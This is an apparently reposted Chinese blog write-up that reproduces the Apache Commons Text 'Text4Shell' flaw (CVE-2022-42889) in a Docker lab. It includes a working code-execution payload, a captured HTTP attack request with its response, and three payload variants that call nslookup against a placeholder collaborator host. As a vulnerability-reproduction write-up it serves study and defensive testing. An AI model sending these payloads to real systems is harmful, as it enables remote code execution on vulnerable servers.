Apache Commons Text 任意代码执行漏洞复现(CVE-2022-42889)
漏洞介绍
Apache Commons Text 是一个专注于处理字符串的算法的库。该组件中存在任意代码执行漏洞,若攻击者对StringSubstitutor处理的字符串可控,则可通过该漏洞在受害者机器上执行任意代码。
更详细的介绍参见:https://nox.qianxin.com/vulnerability/detail/QVD-2022-26848
影响范围
1.5<= Apache Commons Text <=1.9
漏洞环境搭建
参见:https://github.com/karthikuj/cve-2022-42889-text4shell-docker
最好一个云服务器,否则docker环境会无法下载下来,下面按照参考的连接来操作。
- 下载项目
git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
- 下载安装Maven,并编辑jar文件,出现“BUILD SUCCESS”说明编译成功
sudo apt install maven
mvn clean install
- 开始构建docker
docker build --tag=text4shell .
docker images
- 运行docker:
docker run -p 80:8080 text4shell
漏洞复现
访问网站,页面如下:
使用靶场提供的验证代码:${script:javascript:java.lang.Runtime.getRuntime().exec(‘touch /tmp/foo’)}
去docker中验证效果,发现果然创建了一个文件。
docker exec -it <container_id> bash
ls /tmp/
流量包及附件
得到的流量包删除掉pdf后缀:cve-2022-42889.pcap.pdf
GET /text4shell/attack?search=${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} HTTP/1.1
Host: 18.143.196.209
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Content-Type: text/html;charset=UTF-8
Content-Length: 94
Date: Thu, 20 Oct 2022 08:11:14 GMT
Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
补充
此靶场似乎有些问题。
- 根据 https://github.com/SeanWrightSec/CVE-2022-42889-PoC
得知验证代码可以是${script:javascript:195 324}
,但是此靶场验证失败 - 根据 https://github.com/kljunowsky/CVE-2022-42889-text4shell
得知,验证代码共如下三种,但是这个靶场不能全部支持
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
${url:UTF-8:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
${dns:address:java.lang.Runtime.getRuntime().exec('nslookup COLLABORATOR-HERE')}
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhghaeaa
系列文章
更多
同类精品
更多
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01 -
怎样阻止微信小程序自动打开
PHP中文网 06-13